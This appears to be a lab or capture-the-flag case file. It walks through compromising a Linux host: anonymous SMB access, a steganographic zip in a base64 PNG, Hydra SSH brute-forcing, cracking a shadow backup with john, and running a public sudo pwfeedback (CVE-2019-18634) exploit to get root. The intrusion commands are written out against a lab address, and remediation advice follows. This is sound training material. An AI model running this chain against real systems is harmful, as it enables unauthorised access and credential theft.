Case file

SMB journal stego, SSH spray, and sudo pwfeedback overflow

Foundations Linux engagement: anonymous SMB journal decoded to PNG stego; cracked archives and a cherry-blossom wordlist unlocked lily then johan; CVE-2019-18634 pwfeedback overflow completed root.

Foundations32 minLinux · SMB · Steganography · Privilege Escalation
01

Engagement summary

Anonymous SMB journal → base64 PNG → stegpy zip chain → Hydra lily → shadow.bak crack to johan → sudo pwfeedback BOF to root.

CHERRYBLOSSOM exposed SSH and Samba. Anonymous share held journal.txt — base64 of a PNG. stegpy extracted a malformed zip (JPEG magic patched to PK); offline crack opened a CherryTree journal and a cherry-blossom.list wordlist. Hydra against SSH recovered lily. A readable shadow.bak cracked johan’s hash with the same list (su johan; SSH as johan blocked). sudoers enabled pwfeedback; CVE-2019-18634 stack overflow (EDB / public PoC) yielded a root shell.

Business impact

Anonymous SMB file drops are credential and intel leaks. Custom wordlists from stolen journals defeat weak SSH secrets. pwfeedback in sudoers is a known local root — disable it and patch sudo past CVE-2019-18634.

02

Anonymous SMB and journal stego

journal.txt decoded to PNG; stegpy and zip repair recovered the CherryTree archive.

OPERATOR · SMB

savvy@lab:~$ nmap -sV -sC 10.48.176.208

22/tcp open ssh

139/tcp open netbios-ssn

445/tcp open microsoft-ds

savvy@lab:~$ smbclient //10.48.176.208/Anonymous -N -c 'get journal.txt'

savvy@lab:~$ base64 -d journal.txt > journal.png && stegpy journal.png

# extracts zip; fix local header magic if needed → crack → Journal.ctd

03

SSH lily and lateral to johan

Hydra lily with cherry-blossom.list; shadow.bak cracked johan for su.

OPERATOR · SSH

savvy@lab:~$ hydra -l lily -P cherry-blossom.list ssh://10.48.176.208

[22][ssh] host: 10.48.176.208 login: lily password: <cracked>

savvy@lab:~$ ssh lily@10.48.176.208

savvy@lab:~$

savvy@lab:~$ john shadow.bak -w=cherry-blossom.list && su - johan

savvy@lab:~$

04

sudo pwfeedback CVE-2019-18634

Enabled pwfeedback allowed a stack overflow to root.

OPERATOR · ROOT

savvy@lab:~$ sudo -l

# Defaults pwfeedback enabled

savvy@lab:~$ gcc -o exploit exploit.c && ./exploit

root@lab:~# id

uid=0(root) gid=0(root) groups=0(root)

Remediation

Disable anonymous SMB; encrypt journals at rest. Enforce strong unique SSH passwords or keys. Remove pwfeedback; keep sudo patched.